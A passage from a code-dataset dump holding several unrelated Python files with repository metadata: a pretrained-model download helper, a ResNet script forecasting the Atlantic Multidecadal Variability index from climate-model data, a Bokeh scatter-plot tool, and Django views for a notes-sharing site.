('densenet100_k24_cifar100', '1808', '9bfa3e9c736a80906d163380cb361b940c2188bf', 'v0.0.318'),
('densenet100_k12_bc_cifar10', '0416', '6685d1f4844b092471f7d03dfc3fa64a302008e6', 'v0.0.189'),
('densenet100_k12_bc_cifar100', '2119', 'fbd8a54c1c9e4614f950b8473f8524d25caba4a7', 'v0.0.208'),
('densenet190_k40_bc_cifar10', '0252', '87b15be0620c0adff249d33540c20314188b16d7', 'v0.0.286'),
('densenet250_k24_bc_cifar10', '0267', 'dad68693d83a276d14a87dce6cebc5aceebca775', 'v0.0.290'),
('densenet250_k24_bc_cifar100', '1739', '598e91b7906f427296ab72cf40032f0846a52d91', 'v0.0.303'),
('xdensenet40_2_k24_bc_cifar10', '0531', '66c9d384d3ef4ec4095c9759bb8b7986f2f58e26', 'v0.0.226'),
('xdensenet40_2_k24_bc_cifar100', '2396', '73d5ba88a39b971457b9cea2cd72d1e05ab4d165', 'v0.0.227'),
('xdensenet40_2_k24_bc_svhn', '0287', '745f374b398bce378903af8c71cb3c67f6891d7f', 'v0.0.306'),
('xdensenet40_2_k36_bc_cifar10', '0437', 'e9bf419295f833b56fa3da27218107ed42310307', 'v0.0.233'),
('xdensenet40_2_k36_bc_cifar100', '2165', '78b6e754d90774d7b6ec3d811e6e57192148cfbf', 'v0.0.234'),
('xdensenet40_2_k36_bc_svhn', '0274', '4377e8918c1e008201aafc448f642642474eab14', 'v0.0.306'),
('wrn16_10_cifar10', '0293', 'ecf1c17c0814763095df562cb27d15a5aeb51836', 'v0.0.166'),
('wrn16_10_cifar100', '1895', 'bcb5c89ca71ffc99bc09b861b339724047724659', 'v0.0.204'),
('wrn16_10_svhn', '0278', '76f4e1361f9eca82fa4c2764b530f57280a34cfe', 'v0.0.271'),
('wrn28_10_cifar10', '0239', '16f3c8a249993f23b0f81d9ce3650faef5e455d8', 'v0.0.166'),
('wrn28_10_cifar100', '1788', '67ec43c6e913d43c8936809f04b0780035a24835', 'v0.0.320'),
('wrn28_10_svhn', '0271', 'fcd7a6b03a552b22ec25ee9a3833dc260976a757', 'v0.0.276'),
('wrn40_8_cifar10', '0237', '3b81d261706b751f5b731149b05fa92f500218e8', 'v0.0.166'),
('wrn40_8_cifar100', '1803', '114f6be2d5f8d561a5e3b4106fac30028defe300', 'v0.0.321'),
('wrn40_8_svhn', '0254', 'be7a21da6bc958c79725d7a29502c6a781cc67d9', 'v0.0.277'),
('wrn20_10_1bit_cifar10', '0326', 'c1a8ba4f1e1336a289c4b2eec75e25445b511ca6', 'v0.0.302'),
('wrn20_10_1bit_cifar100', '1904', 'adae01d6bec92d4fe388cddbb7f7eb598b1655d1', 'v0.0.302'),
('wrn20_10_1bit_svhn', '0273', 'ce9f819cf117fa66af112d9cbb0b65568623118d', 'v0.0.302'),
('wrn20_10_32bit_cifar10', '0314', '355496184493a55323c99bad9f79b0803548d373', 'v0.0.302'),
('wrn20_10_32bit_cifar100', '1812', 'd064f38aeaa14e9a2f4e9893ef6cca65615c53f9', 'v0.0.302'),
('wrn20_10_32bit_svhn', '0259', 'd9e8b46e180a34c0a765e22d24741f3849fca13a', 'v0.0.302'),
('ror3_56_cifar10', '0543', 'ee31a69a0503b41878c49d8925ac8e7ee813293b', 'v0.0.228'),
('ror3_56_cifar100', '2549', '4334559313cd9291af3d6ec0df144b21e695228b', 'v0.0.229'),
('ror3_56_svhn', '0269', '56617cf90e0902e88686af14939605c45d1170cf', 'v0.0.287'),
('ror3_110_cifar10', '0435', '0359916596cba01dfa481f105094c1047f592980', 'v0.0.235'),
('ror3_110_cifar100', '2364', 'b8c4d317241f54990180443d7fd9702d79c57ccc', 'v0.0.236'),
('ror3_110_svhn', '0257', '0677b7dfee32659a92719a5a16a7f387a5635f0b', 'v0.0.287'),
('ror3_164_cifar10', '0393', 'cc11aa06d928d0805279baccbf2b82371c31f503', 'v0.0.294'),
('ror3_164_cifar100', '2234', 'eb6a7fb8128240d84843a8e39adb00f606b6e2cf', 'v0.0.294'),
('ror3_164_svhn', '0273', 'b008c1b01386aca1803a1286607c5e1f843fc919', 'v0.0.294'),
('rir_cifar10', '0328', '5bed6f3506055b3ab5c4780a540cfebe014490ec', 'v0.0.292'),
('rir_cifar100', '1923', 'c42563834a971e18eacfc2287585aa2efa8af3eb', 'v0.0.292'),
('rir_svhn', '0268', '1c0718deaef5836efca4d5ded6140f0cd51424ab', 'v0.0.292'),
('shakeshakeresnet20_2x16d_cifar10', '0515', 'a7b8a2f77457e151da5d5ad3b9a2473594fecfc0', 'v0.0.215'),
('shakeshakeresnet20_2x16d_cifar100', '2922', 'e46e31a7d8308b57d9c0687000c40f15623998c2', 'v0.0.247'),
('shakeshakeresnet20_2x16d_svhn', '0317', '7a48fde5e1ccd5ff695892adf7094c15368ec778', 'v0.0.295'),
('shakeshakeresnet26_2x32d_cifar10', '0317', '21e60e626765001aaaf4eb26f7cb8f4a69ea3dc1', 'v0.0.217'),
('shakeshakeresnet26_2x32d_cifar100', '1880', 'bd46a7418374e3b3c844b33e12b09b6a98eb4e6e', 'v0.0.222'),
('shakeshakeresnet26_2x32d_svhn', '0262', 'f1dbb8ef162d9ec56478e2579272f85ed78ad896', 'v0.0.295'),
('resnet10_cub', '2765', '9dab9a498c380e6b7447827e00996d7cc61cc414', 'v0.0.335'),
('resnet12_cub', '2658', 'a46b8ec2d8dcd66a628dcfcb617acb15ef786b95', 'v0.0.336'),
('resnet14_cub', '2435', '0b9801b2e3aa3908bbc98f50d3ae3e986652742b', 'v0.0.337'),
('resnet16_cub', '2321', '031374ada9830869372a63e132c2477a04425444', 'v0.0.338'),
('ntsnet_cub', '1326', '75ae8cdcf4beb1ab60c1a983c9f143baaebbdea0', 'v0.0.334'),
('pspnet_resnetd101b_voc', '8144', 'e15319bf5428637e7fc00dcd426dd458ac937b08', 'v0.0.297'),
('pspnet_resnetd50b_ade20k', '3687', 'f0dcdf734f8f32a879dec3c4e7fe61d629244030', 'v0.0.297'),
('pspnet_resnetd101b_ade20k', '3797', 'c1280aeab8daa31c0893f7551d70130c2b68214a', 'v0.0.297'),
('pspnet_resnetd101b_cityscapes', '7172', 'd5ad2fa4c4208f439ab0b98267babe0c4d9e6e94', 'v0.0.297'),
('pspnet_resnetd101b_coco', '6741', '87582b79c48c4e995de808ff0cbc162c55b52031', 'v0.0.297'),
('deeplabv3_resnetd101b_voc', '8024', '8ee3099c5c983ef1cc0ce23b23d91db40b2986b8', 'v0.0.298'),
('deeplabv3_resnetd152b_voc', '8120', '88fb315dc3c58a84f325e63105fbfe322932073f', 'v0.0.298'),
('deeplabv3_resnetd50b_ade20k', '3713', '5d5e2f74008ab3637a05b6b1357c9c339296188c', 'v0.0.298'),
('deeplabv3_resnetd101b_ade20k', '3784', '6224836f8f31a00be1718a530a20670136bb3958', 'v0.0.298'),
('deeplabv3_resnetd101b_coco', '6773', '74dc9914078e47feb3ff64fba717d1d4040d8235', 'v0.0.298'),
('deeplabv3_resnetd152b_coco', '6899', 'edd79b4ca095f1674e7a68ee0dc8ed8bcd0b6a26', 'v0.0.298'),
('fcn8sd_resnetd101b_voc', '8040', 'f6c67c75bce4f9a3e17bf555369c0c9332ab5c1f', 'v0.0.299'),
('fcn8sd_resnetd50b_ade20k', '3339', '9856c5ee8186d1ac4b0eb5177c73e76c4cd63bb0', 'v0.0.299'),
('fcn8sd_resnetd101b_ade20k', '3588', '081774b2fb373d7b759cda2160fa0d2599b1c5f1', 'v0.0.299'),
('fcn8sd_resnetd101b_coco', '6011', '05e97cc5f5fcdf1c5ec5c617062d43adfe150d88', 'v0.0.299'),
]}
imgclsmob_repo_url = 'https://github.com/osmr/imgclsmob'
def get_model_name_suffix_data(model_name):
if model_name not in _model_sha1:
raise ValueError('Pretrained model for {name} is not available.'.format(name=model_name))
error, sha1_hash, repo_release_tag = _model_sha1[model_name]
return error, sha1_hash, repo_release_tag
def get_model_file(model_name,
local_model_store_dir_path=os.path.join('~', '.mxnet', 'models')):
"""
    Return the location of a pretrained model file on the local file system. This function downloads the file from
    the online model zoo when the file cannot be found locally or its hash does not match. The root directory will be created if it doesn't exist.
Parameters
----------
model_name : str
Name of the model.
local_model_store_dir_path : str, default $MXNET_HOME/models
Location for keeping the model parameters.
Returns
-------
file_path
Path to the requested pretrained model file.
"""
error, sha1_hash, repo_release_tag = get_model_name_suffix_data(model_name)
short_sha1 = sha1_hash[:8]
file_name = '{name}-{error}-{short_sha1}.params'.format(
name=model_name,
error=error,
short_sha1=short_sha1)
local_model_store_dir_path = os.path.expanduser(local_model_store_dir_path)
file_path = os.path.join(local_model_store_dir_path, file_name)
if os.path.exists(file_path):
if check_sha1(file_path, sha1_hash):
return file_path
else:
logging.warning('Mismatch in the content of model file detected. Downloading again.')
else:
logging.info('Model file not found. Downloading to {}.'.format(file_path))
if not os.path.exists(local_model_store_dir_path):
os.makedirs(local_model_store_dir_path)
zip_file_path = file_path + '.zip'
download(
url='{repo_url}/releases/download/{repo_release_tag}/{file_name}.zip'.format(
repo_url=imgclsmob_repo_url,
repo_release_tag=repo_release_tag,
file_name=file_name),
path=zip_file_path,
overwrite=True)
with zipfile.ZipFile(zip_file_path) as zf:
zf.extractall(local_model_store_dir_path)
os.remove(zip_file_path)
if check_sha1(file_path, sha1_hash):
return file_path
else:
raise ValueError('Downloaded file has different hash. Please try again.')
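# ---------------------------------------------------------------------------
# Usage sketch (hedged): 'preresnet20_cifar10' is one of the keys listed in
# _model_sha1 above; the first call downloads and caches the parameter file
# and returns its local path. The `net` object is a hypothetical Gluon block.
#
#   params_path = get_model_file('preresnet20_cifar10')
#   net.load_parameters(params_path)
# ---------------------------------------------------------------------------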
|
[
"osemery@gmail.com"
] |
osemery@gmail.com
|
3250ad1570e4e1fc2fe80c9dd17069f48f7b0791
|
96c2daf3ca0966191a29657cb444034a079880c5
|
/Scrap/CNN/ResNet50_test_lead_ann.py
|
63164ebac96ed50d5d3464b6e1d30ddacb8d9756
|
[] |
no_license
|
weilin2018/predict_amv
|
282c65ab7cbd59d0ae94a3903af015a5738f4566
|
2a2cc9c01e291992c2e97d40f47f4defe1566cd8
|
refs/heads/master
| 2023-03-27T06:00:23.551320
| 2021-03-26T02:42:17
| 2021-03-26T02:42:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,804
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
ResNet50 Test Lead, Annual
Train ResNet50 to forecast AMV Index at a set of lead times, given
normalized input from the CESM Large Ensemble
Can also indicate the region over which to predict the AMV Index
"""
import numpy as np
from tqdm import tqdm
import torch
from torch import nn
import torch.optim as optim
from torch.utils.data import DataLoader, TensorDataset
import torchvision.models as models
from torchvision import datasets, transforms as T
import os
import time
import copy
import matplotlib.pyplot as plt
## -------------
#%% User Edits
# -------------
allstart = time.time()
# Indicate machine to set path
machine='stormtrack'
# Set directory and load data depending on machine
if machine == 'local-glenn':
os.chdir('/Users/gliu/Downloads/2020_Fall/6.862/Project/predict_amv/CNN/')
outpath = '/Users/gliu/Downloads/2020_Fall/6.862/Project/'
else:
outpath = os.getcwd()
sst_normed = np.load('../../CESM_data/CESM_SST_normalized_lat_weighted.npy').astype(np.float32)
# Data preparation settings
leads = np.arange(0,25,1) # Time ahead (in years) to forecast AMV
resolution = '2deg' # Resolution of input (2deg or full)
season = 'Ann' # Season to take mean over
indexregion = 'NAT' # One of the following ("SPG","STG","TRO","NAT")
# Training/Testing Subsets
percent_train = 0.8 # Percentage of data to use for training (remaining for testing)
ens = 1 # Ensemble members to use
# Model training settings
max_epochs = 10
batch_size = 32 # Pairs of predictions
loss_fn = nn.MSELoss() # Loss Function
opt = ['Adadelta',0.1,0] # [optimizer name, learning rate, weight decay]
# Set model architecture
netname = 'RN18'
resnet50 = models.resnet18(pretrained=True)
# model = nn.Sequential(nn.Conv2d(in_channels=channels, out_channels=3, kernel_size=(1,1),padding=(95,67)),
# resnet50,
# nn.Linear(in_features=1000,out_features=1))
#
# Options
debug= True # Visualize training and testing loss
verbose = False # Print loss for each epoch
#%% Functions
#
def train_CNN(layers,loss_fn,optimizer,trainloader,testloader,max_epochs,verbose=True):
"""
inputs:
layers - tuple of NN layers
loss_fn - (torch.nn) loss function
opt - tuple of [optimizer_name, learning_rate, weight_decay] for updating the weights
currently supports "Adadelta" and "SGD" optimizers
        trainloader - (torch.utils.data.DataLoader) for training dataset
testloader - (torch.utils.data.DataLoader) for testing dataset
max_epochs - number of training epochs
verbose - set to True to display training messages
output:
dependencies:
from torch import nn,optim
"""
model = nn.Sequential(*layers) # Set up model
bestloss = np.infty
# Set optimizer
if optimizer[0] == "Adadelta":
opt = optim.Adadelta(model.parameters(),lr=optimizer[1],weight_decay=optimizer[2])
elif optimizer[0] == "SGD":
opt = optim.SGD(model.parameters(),lr=optimizer[1],weight_decay=optimizer[2])
elif optimizer[0] == 'Adam':
opt = optim.Adam(model.parameters(),lr=optimizer[1],weight_decay=optimizer[2])
train_loss,test_loss = [],[] # Preallocate tuples to store loss
for epoch in tqdm(range(max_epochs)): # loop by epoch
#for epoch in range(max_epochs):
for mode,data_loader in [('train',trainloader),('eval',testloader)]: # train/test for each epoch
if mode == 'train': # Training, update weights
model.train()
elif mode == 'eval': # Testing, freeze weights
model.eval()
runningloss = 0
for i,data in enumerate(data_loader):
# Get mini batch
batch_x, batch_y = data
# Set gradients to zero
opt.zero_grad()
# Forward pass
pred_y = model(batch_x).squeeze()
                # Calculate loss
loss = loss_fn(pred_y,batch_y.squeeze())
# Update weights
if mode == 'train':
loss.backward() # Backward pass to calculate gradients w.r.t. loss
opt.step() # Update weights using optimizer
## Investigate need for model.eval() in calculating train loss
# model.eval()
# # Forward pass
# pred_y = model(batch_x).squeeze()
# # Calculate loss
# loss = loss_fn(pred_y,batch_y.squeeze())
runningloss += loss.item()
#print("Runningloss %.2f"%runningloss)
if verbose: # Print message
                print('{} Set: Epoch {:02d}. loss: {:.3f}'.format(mode, epoch+1, \
runningloss/len(data_loader)))
if (runningloss/len(data_loader) < bestloss) and (mode == 'eval'):
bestloss = runningloss/len(data_loader)
bestmodel = copy.deepcopy(model)
if verbose:
print("Best Loss of %f at epoch %i"% (bestloss,epoch+1))
# Save running loss values for the epoch
if mode == 'train':
train_loss.append(runningloss/len(data_loader))
else:
test_loss.append(runningloss/len(data_loader))
return bestmodel,train_loss,test_loss
def calc_AMV_index(region,invar,lat,lon):
"""
Select bounding box for a given AMV region for an input variable
"SPG" - Subpolar Gyre
"STG" - Subtropical Gyre
"TRO" - Tropics
"NAT" - North Atlantic
Parameters
----------
region : STR
One of following the 3-letter combinations indicating selected region
("SPG","STG","TRO","NAT")
var : ARRAY [Ensemble x time x lat x lon]
Input Array to select from
lat : ARRAY
Latitude values
lon : ARRAY
Longitude values
Returns
-------
amv_index [ensemble x time]
AMV Index for a given region/variable
"""
# Select AMV Index region
bbox_SP = [-60,-15,40,65]
bbox_ST = [-80,-10,20,40]
bbox_TR = [-75,-15,0,20]
bbox_NA = [-80,0 ,0,65]
regions = ("SPG","STG","TRO","NAT") # Region Names
bboxes = (bbox_SP,bbox_ST,bbox_TR,bbox_NA) # Bounding Boxes
# Get bounding box
bbox = bboxes[regions.index(region)]
# Select Region
selvar = invar.copy()
klon = np.where((lon>=bbox[0]) & (lon<=bbox[1]))[0]
klat = np.where((lat>=bbox[2]) & (lat<=bbox[3]))[0]
selvar = selvar[:,:,klat[:,None],klon[None,:]]
    # Take mean over region
amv_index = np.nanmean(selvar,(2,3))
return amv_index
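# Illustrative use of calc_AMV_index (shapes follow the docstring above): with
# sst_normed of shape [ensemble x time x lat x lon],
#   amv = calc_AMV_index("SPG", sst_normed, lat, lon)
# averages SST over the subpolar gyre box (60W-15W, 40N-65N) and returns an
# [ensemble x time] index.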
# ----------------------------------------
# %% Set-up
# ----------------------------------------
# Set experiment names ----
nvar = 4 # Combinations of variables to test
nlead = len(leads)
# Save data (ex: Ann2deg_NAT_CNN2_nepoch5_nens_40_lead24 )
expname = "%s%s_%s_%s_nepoch%02i_nens%02i_lead%02i" % (season,resolution,indexregion,netname,max_epochs,ens,len(leads)-1)
# Load the data for whole North Atlantic
sst_normed = np.load('../../CESM_data/CESM_sst_normalized_lat_weighted_%s_NAT_%s.npy' % (resolution,season)).astype(np.float32)
sss_normed = np.load('../../CESM_data/CESM_sss_normalized_lat_weighted_%s_NAT_%s.npy' % (resolution,season)).astype(np.float32)
psl_normed = np.load('../../CESM_data/CESM_psl_normalized_lat_weighted_%s_NAT_%s.npy' % (resolution,season)).astype(np.float32)
# Load lat/lon
lon = np.load("../../CESM_data/lon_%s_NAT.npy"%(resolution))
lat = np.load("../../CESM_data/lat_%s_NAT.npy"%(resolution))
nens,tstep,nlat,nlon = sst_normed.shape
# Preallocate Relevant Variables...
corr_grid_train = np.zeros((nlead))
corr_grid_test = np.zeros((nlead))
train_loss_grid = np.zeros((max_epochs,nlead))
test_loss_grid = np.zeros((max_epochs,nlead))
# ----------------------------------------------
# %% Train for each variable combination and lead time
# ----------------------------------------------
channels = 1
for v in range(nvar): # Loop for each variable
start = time.time()
if v == 0:
varname = 'SST'
invars = [sst_normed]
elif v == 1:
varname = 'SSS'
invars = [sss_normed]
elif v == 2:
varname = 'PSL'
invars = [psl_normed]
elif v == 3:
channels = 3
varname = 'ALL'
invars = [sst_normed,sss_normed,psl_normed]
outname = "/leadtime_testing_%s_%s.npz" % (varname,expname)
# Begin Loop
for l,lead in enumerate(leads):
start = time.time()
# Apply lead/lag to data
y = calc_AMV_index(indexregion,sst_normed[:ens,lead:,:,:],lat,lon)
y = y.reshape((y.shape[0]*y.shape[1]))[:,None]
X = np.transpose(np.array(invars)[:,:ens,0:tstep-lead,:,:].reshape(channels,(tstep-lead)*ens,nlat,nlon),
(1,0,2,3))
# Split into training and test sets
X_train = torch.from_numpy( X[0:int(np.floor(percent_train*(tstep-lead)*ens)),:,:,:] )
y_train = torch.from_numpy( y[0:int(np.floor(percent_train*(tstep-lead)*ens)),:] )
X_val = torch.from_numpy( X[int(np.floor(percent_train*(tstep-lead)*ens)):,:,:,:] )
y_val = torch.from_numpy( y[int(np.floor(percent_train*(tstep-lead)*ens)):,:] )
# Put into pytorch DataLoader
train_loader = DataLoader(TensorDataset(X_train, y_train), batch_size=batch_size)
val_loader = DataLoader(TensorDataset(X_val, y_val), batch_size=batch_size)
# Load resnet
resnet50 = models.resnet50(pretrained=True)
layers = [nn.Conv2d(in_channels=channels, out_channels=3, kernel_size=(1,1),padding=(95,67)),
resnet50,
nn.Linear(in_features=1000,out_features=1)]
# Train CNN
model,trainloss,testloss = train_CNN(layers,loss_fn,opt,train_loader,val_loader,max_epochs,verbose=verbose)
# Save train/test loss
        train_loss_grid = np.array(trainloss)  # store the per-epoch training loss
test_loss_grid = np.array(testloss)
# Evalute the model
model.eval()
y_pred_val = model(X_val).detach().numpy()
y_valdt = y_val.detach().numpy()
y_pred_train = model(X_train).detach().numpy()
y_traindt = y_train.detach().numpy()
# Get the correlation (save these)
traincorr = np.corrcoef( y_pred_train.T[0,:], y_traindt.T[0,:])[0,1]
testcorr = np.corrcoef( y_pred_val.T[0,:], y_valdt.T[0,:])[0,1]
if np.isnan(traincorr) | np.isnan(testcorr):
if debug:
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
ax.plot(trainloss[1:],label='train loss')
ax.plot(testloss[1:],label='test loss')
ax.legend()
ax.set_title("Losses for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
#ax.plot(y_pred_train,label='train corr')
ax.plot(y_pred_val,label='test corr')
ax.plot(y_valdt,label='truth')
ax.legend()
ax.set_title("Correlation for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
print("Warning, NaN Detected for lead %i of %i. Stopping!" % (lead,len(leads)))
break
# Calculate Correlation and RMSE
corr_grid_test = np.corrcoef( y_pred_val.T[0,:], y_valdt.T[0,:])[0,1]
corr_grid_train = np.corrcoef( y_pred_train.T[0,:], y_traindt.T[0,:])[0,1]
# Save the model
modout = "%s%s_%s_lead%i.pt" %(outpath,expname,varname,lead)
torch.save(model.state_dict(),modout)
# Save Data
outname = "/leadtime_testing_%s_%s_lead%02i.npz" % (varname,expname,lead)
np.savez(outpath+outname,**{
'train_loss': train_loss_grid,
'test_loss': test_loss_grid,
'test_corr': corr_grid_test,
'train_corr': corr_grid_train}
)
if debug:
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
ax.plot(trainloss[1:],label='train loss')
ax.plot(testloss[1:],label='test loss')
ax.legend()
ax.set_title("Losses for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
fig,ax=plt.subplots(1,1)
plt.style.use('seaborn')
#ax.plot(y_pred_train,label='train corr')
ax.plot(y_pred_val,label='test corr')
ax.plot(y_valdt,label='truth')
ax.legend()
ax.set_title("Correlation for Predictor %s Leadtime %i"%(varname,lead))
plt.show()
print("\nCompleted training for lead %i of %i in %.2fs" % (lead,len(leads),time.time()-start))
print("Saved data to %s%s. Script ran to completion in %ss"%(outpath,outname,time.time()-start))
|
[
"glenn.y.liu@gmail.com"
] |
glenn.y.liu@gmail.com
|
1078df92752f26a966e20cd0f21e05fcdd32c400
|
df1482f251a2d801e7b77bbd1d5c9a408e71e7ef
|
/05_visualization/plot_interactive_scatter.py
|
36e98b4e9ec6447f6dc83c224b9918ce2a0b96ee
|
[] |
no_license
|
silvewheat/bioNotes
|
a34e1aa79df42799d83b5c4f3e1b2a583360fc1a
|
d96c4710c1f620c18fdf92fe21f38d73671b9580
|
refs/heads/master
| 2021-12-30T01:52:40.925861
| 2021-12-27T14:11:30
| 2021-12-27T14:11:30
| 113,825,423
| 3
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,115
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jan 9 17:00:44 2018
@author: Caiyd
"""
import json
import click
import pandas as pd
import seaborn as sns
from bokeh.plotting import figure, ColumnDataSource, output_file, save
from bokeh.models import HoverTool, BoxZoomTool, ResetTool, WheelZoomTool, PanTool, SaveTool, ZoomInTool, ZoomOutTool
def load_dataset(datafile, xcol: str, ycol: str, tags: tuple, groupby):
"""
    Tab-separated tabular input with a header row.
"""
cols = list(tags) + [xcol, ycol]
if groupby:
cols.append(groupby)
df = pd.read_csv(datafile, sep='\t', usecols=cols)
print(df.head())
return df
def plot(df, xcol, ycol, tags, groupby, colors, outprefix):
output_file(f'{outprefix}.html')
tooltips = [(f"({xcol},{ycol})", f"(@{xcol}, @{ycol})")]
for tag in tags:
tooltips.append((f"{tag}", f"@{tag}"))
hover = HoverTool(tooltips=tooltips)
p = figure(title="", tools=[hover, BoxZoomTool(), ResetTool(), WheelZoomTool(), PanTool(), SaveTool(), ZoomInTool(), ZoomOutTool()],
toolbar_location="below", toolbar_sticky=False,
plot_width=800, plot_height=600,
x_axis_label=xcol, y_axis_label=ycol)
if groupby:
for ngroup, group in enumerate(df[groupby].unique()):
if type(colors) == dict:
color = colors[group]
else:
color = colors[ngroup]
source = ColumnDataSource(df.loc[df[groupby] == group, :])
p.circle(x=xcol, y=ycol, size=10, alpha=1,
color=color, source=source, legend=group)
p.legend.location = "top_left"
p.legend.click_policy="hide"
else:
source = ColumnDataSource(df)
p.circle(x=xcol, y=ycol, size=10, alpha=0.8,
color=colors, source=source)
save(p)
@click.command()
@click.option('--datafile', help='Data file used for plotting, TSV format with the first row as header')
@click.option('--xcol', help='Variable shown on the x axis (one of the column names in the header)')
@click.option('--ycol', help='Variable shown on the y axis')
@click.option('--tags', '-t', help='Label column(s) shown for each data point (may be repeated, e.g. -t IID -t GID)', multiple=True)
@click.option('--groupby', help='Column used to group points and give them different colours, default is False', default=False, type=str)
@click.option('--groupcolor', help='JSON file mapping groups to colours; if omitted, a built-in palette is used', default=False)
@click.option('--outprefix', help='Prefix of the output HTML file (writes {outprefix}.html)')
def main(datafile, xcol, ycol, tags, groupby, groupcolor, outprefix):
"""
    Interactive scatter plot.
"""
df = load_dataset(datafile, xcol, ycol, tags, groupby)
if groupby:
ngroup = len(df[groupby].unique())
if groupcolor:
with open(groupcolor) as f:
colors = json.load(f)
else:
colors = sns.color_palette("Set2", ngroup).as_hex()
else:
colors = 'blue'
plot(df, xcol, ycol, tags, groupby, colors, outprefix)
if __name__ == '__main__':
main()
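# Example invocation (file and column names are illustrative):
#   python plot_interactive_scatter.py --datafile pca.tsv --xcol PC1 --ycol PC2 \
#       -t IID -t GID --groupby Population --outprefix pca_scatter
# This writes an interactive pca_scatter.html with hover tooltips for IID and GID.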
|
[
"silverwheat@163.com"
] |
silverwheat@163.com
|
6b50f463d5aae81034a63640b931851a10de45d4
|
ca0f021e8f872a4a9ba5ef4e1ceb60bd6b0f5f1d
|
/bnotes/views.py
|
41aeff996e53472d8a99303f02c4f168e5c82141
|
[] |
no_license
|
RitikPatle/Bnotes-Minor1
|
490409d98b36535f679150eefe1b1fd0732daaed
|
3dbf4b1b95a894b46302dfa99bc3dd532affe2ae
|
refs/heads/master
| 2023-04-30T20:59:21.374543
| 2021-05-12T09:15:24
| 2021-05-12T09:15:24
| 366,656,100
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,568
|
py
|
from .models import *
from django.shortcuts import render,redirect
# Create your views here.
def index(request):
return render(request,'index.html')
def notes(request):
subs=Notes.objects.all()
return render(request,'notes.html',{'subs':subs})
def cs(request):
obj1=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","1"])
obj2=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","2"])
obj3=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","3"])
obj4=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","4"])
obj5=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","5"])
obj6=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","6"])
obj7=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","7"])
obj8=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["cs","8"])
return render(request,'subn.html',{'streamname':'Computer Science Engineering','obj1':obj1,'obj2':obj2,'obj3':obj3,'obj4':obj4,'obj5':obj5,'obj6':obj6,'obj7':obj7,'obj8':obj8})
def me(request):
obj1=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","1"])
obj2=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","2"])
obj3=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","3"])
obj4=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","4"])
obj5=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","5"])
obj6=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","6"])
obj7=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","7"])
obj8=Sub.objects.raw('select * from bnotes_sub where stream=%s and sem=%s',["me","8"])
return render(request,'subn.html',{'streamname':'Mechanical Engineering','obj1':obj1,'obj2':obj2,'obj3':obj3,'obj4':obj4,'obj5':obj5,'obj6':obj6,'obj7':obj7,'obj8':obj8})
def papers(request):
psubs=Papers.objects.all()
return render(request,'papers.html',{'psubs':psubs})
def pcs(request):
objp1=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","1"])
objp2=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","2"])
objp3=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","3"])
objp4=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","4"])
objp5=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","5"])
objp6=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","6"])
objp7=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","7"])
objp8=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["cs","8"])
return render(request,'subp.html',{'streamname':'Computer Science Engineering','objp1':objp1,'objp2':objp2,'objp3':objp3,'objp4':objp4,'objp5':objp5,'objp6':objp6,'objp7':objp7,'objp8':objp8})
def pme(request):
objp1=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","1"])
objp2=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","2"])
objp3=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","3"])
objp4=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","4"])
objp5=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","5"])
objp6=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","6"])
objp7=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","7"])
objp8=Pub.objects.raw('select * from bnotes_pub where stream=%s and sem=%s',["me","8"])
return render(request,'subp.html',{'streamname':'Mechanical Engineering','objp1':objp1,'objp2':objp2,'objp3':objp3,'objp4':objp4,'objp5':objp5,'objp6':objp6,'objp7':objp7,'objp8':objp8})
def about(request):
return render(request,'about.html')
def contact(request):
return render(request,'cu.html')
def feedback(request):
if request.method == 'POST':
post=Post()
post.name=request.POST["name"]
post.email=request.POST["email"]
post.mobno=request.POST["mobno"]
post.comments=request.POST["comments"]
post.save()
return redirect('contact')
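# Sketch of a more compact alternative (illustrative, not wired into any URL
# conf): the eight per-semester raw queries above could be generated in a loop,
# e.g.
#
#   def _subs_by_sem(stream):
#       return {'obj%d' % sem: Sub.objects.raw(
#           'select * from bnotes_sub where stream=%s and sem=%s',
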